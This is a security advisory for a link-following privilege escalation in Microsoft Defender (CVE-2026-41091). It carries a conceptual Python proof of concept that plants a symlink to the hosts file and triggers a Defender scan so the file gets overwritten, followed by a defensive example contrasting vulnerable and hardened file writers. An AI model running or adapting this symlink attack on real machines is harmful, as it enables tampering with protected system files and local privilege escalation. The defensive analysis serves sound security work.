Improper link resolution before file access ('link following') in Microsoft Defender allows an authorized attacker to elevate privileges locally.
CVSS Details
CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
Microsoft Defender (specific affected versions not disclosed)
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual PoC for CVE-2026-41091 (link following in Microsoft Defender).
# It shows the general shape of the attack: plant a link where the privileged
# component is expected to write, then make it write. The drop path, the
# trigger and the target are hypothetical; the advisory does not disclose the
# path Defender actually writes to or how that write is reached.
import os
import subprocess
import sys

# Target system file to overwrite (e.g., a system config or DLL)
target_file = r"C:\Windows\System32\drivers\etc\hosts"
# Path that Microsoft Defender is expected to write to (hypothetical)
defender_drop_path = r"C:\Temp\DefenderQuarantine\malicious_file.tmp"

print(f"[*] Creating symlink from {defender_drop_path} to {target_file}")
# Caveat: os.symlink creates a file symlink, which on Windows needs
# SeCreateSymbolicLinkPrivilege (held by administrators) or Developer Mode.
# A real local privilege escalation needs a link primitive the low-privileged
# user already has (on Windows usually an NTFS junction, which needs no
# privilege); the primitive this CVE depends on is not disclosed, so the
# symlink here only stands in for the concept.
try:
    if os.path.lexists(defender_drop_path):
        os.remove(defender_drop_path)
    os.makedirs(os.path.dirname(defender_drop_path), exist_ok=True)
    os.symlink(target_file, defender_drop_path)
    print("[+] Symlink created successfully.")
except OSError as e:
    print(f"[-] Failed to create symlink: {e}")
    sys.exit(1)

# Trigger Microsoft Defender to scan the path. Start-MpScan is the real
# Defender cmdlet; whether a custom scan reaches the vulnerable write is
# hypothetical.
print("[*] Triggering Microsoft Defender scan on the symlinked path...")
subprocess.run(
    ["powershell", "-NoProfile", "-Command",
     f"Start-MpScan -ScanPath '{defender_drop_path}' -ScanType CustomScan"],
    check=False,
)
print("[*] Waiting for Defender to process the file...")
print("[*] If exploited, Defender may have written data to the target file.")
```
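The defect class named in the advisory, improper link resolution before file access (CWE-59), comes down to a privileged writer opening a path with a plain open() and following whatever link an attacker left there. The example below is added here and is not Defender code or part of the original page: a vulnerable writer beside a hardened one that refuses links both in the directory and in the final component, run against a constructed scenario (temporary directories standing in for System32 and for the drop path, a stand-in hosts file, attacker-chosen contents). All names and paths in it are assumptions for illustration.

```python
# Added example (not Microsoft Defender code): link following (CWE-59) in a
# privileged file writer, beside a hardened writer that refuses to follow links.
# All paths, names and contents below are constructed for illustration.
import os
import stat
import tempfile
from pathlib import Path


def _is_link(st: os.stat_result) -> bool:
    """True for a POSIX symlink or any Windows reparse point (symlink, junction)."""
    if stat.S_ISLNK(st.st_mode):
        return True
    attrs = getattr(st, "st_file_attributes", 0)  # present on Windows only
    return bool(attrs & getattr(stat, "FILE_ATTRIBUTE_REPARSE_POINT", 0))


def vulnerable_write(path: str, data: bytes) -> None:
    """Opens `path` like an ordinary file: a planted link at that path silently
    redirects the write into whatever file the link points at."""
    with open(path, "wb") as f:
        f.write(data)


def hardened_write(base_dir: str, name: str, data: bytes) -> str:
    """Writes `name` inside `base_dir` without resolving links.
    The name must be bare (no traversal), the directory must not itself be a
    link or junction, and the final component is opened with O_NOFOLLOW via a
    directory descriptor where the platform supports it (POSIX). Windows has no
    O_NOFOLLOW, so there an lstat check is used, which leaves a check-to-use race."""
    if os.path.basename(name) != name or name in ("", ".", ".."):
        raise ValueError(f"refusing non-bare file name: {name!r}")
    dir_st = os.lstat(base_dir)
    if not stat.S_ISDIR(dir_st.st_mode) or _is_link(dir_st):
        raise PermissionError(f"{base_dir} is a link or not a directory")
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_BINARY", 0)
    path = os.path.join(base_dir, name)
    if os.open in os.supports_dir_fd and hasattr(os, "O_NOFOLLOW"):
        # Anchor on the directory so it cannot be swapped after the lstat above;
        # O_NOFOLLOW makes the open fail (ELOOP) if `name` is a symlink.
        dfd = os.open(base_dir, os.O_RDONLY | getattr(os, "O_DIRECTORY", 0) | os.O_NOFOLLOW)
        try:
            fd = os.open(name, flags | os.O_NOFOLLOW, 0o600, dir_fd=dfd)
        finally:
            os.close(dfd)
    else:
        if os.path.lexists(path) and _is_link(os.lstat(path)):
            raise PermissionError(f"{path} is a symlink or reparse point")
        fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def run_scenarios() -> dict:
    """Constructed scenario: an attacker plants links in a writable drop
    directory, then a privileged component writes a file there."""
    r = {}
    with tempfile.TemporaryDirectory() as root:
        system_dir = Path(root, "system")  # stand-in for System32
        drop_dir = Path(root, "drop")      # stand-in for the drop path
        system_dir.mkdir()
        drop_dir.mkdir()
        protected = system_dir / "hosts"
        original = b"127.0.0.1 localhost\n"
        payload = b"0.0.0.0 update.example.invalid\n"  # attacker-chosen content
        protected.write_bytes(original)

        # Attacker step: <drop>/malicious_file.tmp -> <system>/hosts
        (drop_dir / "malicious_file.tmp").symlink_to(protected)

        # The vulnerable writer follows the link and clobbers the protected file.
        vulnerable_write(str(drop_dir / "malicious_file.tmp"), payload)
        r["vulnerable_clobbered"] = protected.read_bytes() == payload

        # The hardened writer refuses the link and leaves the file untouched.
        protected.write_bytes(original)
        try:
            hardened_write(str(drop_dir), "malicious_file.tmp", payload)
            r["hardened_refused_file_link"] = False
        except OSError:
            r["hardened_refused_file_link"] = True
        r["protected_intact"] = protected.read_bytes() == original

        # The drop directory itself replaced by a link (the junction case).
        real_drop = drop_dir.rename(drop_dir.with_name("drop.real"))
        drop_dir.symlink_to(system_dir, target_is_directory=True)
        try:
            hardened_write(str(drop_dir), "hosts", payload)
            r["hardened_refused_dir_link"] = False
        except OSError:
            r["hardened_refused_dir_link"] = True

        # A plain file in a real directory is still written normally.
        out = hardened_write(str(real_drop), "report.txt", b"ok")
        r["hardened_wrote_plain_file"] = Path(out).read_bytes() == b"ok"
    return r
```

The POSIX branch is the one without a race: the directory is held open and the file is opened relative to that descriptor with O_NOFOLLOW, so the attacker cannot swap either component between the check and the write. The Windows branch only narrows the window; the native equivalent for a Windows service is to open with FILE_FLAG_OPEN_REPARSE_POINT so that a planted link is opened as the reparse point itself rather than followed, and to write only into directories the low-privileged user cannot modify in the first place.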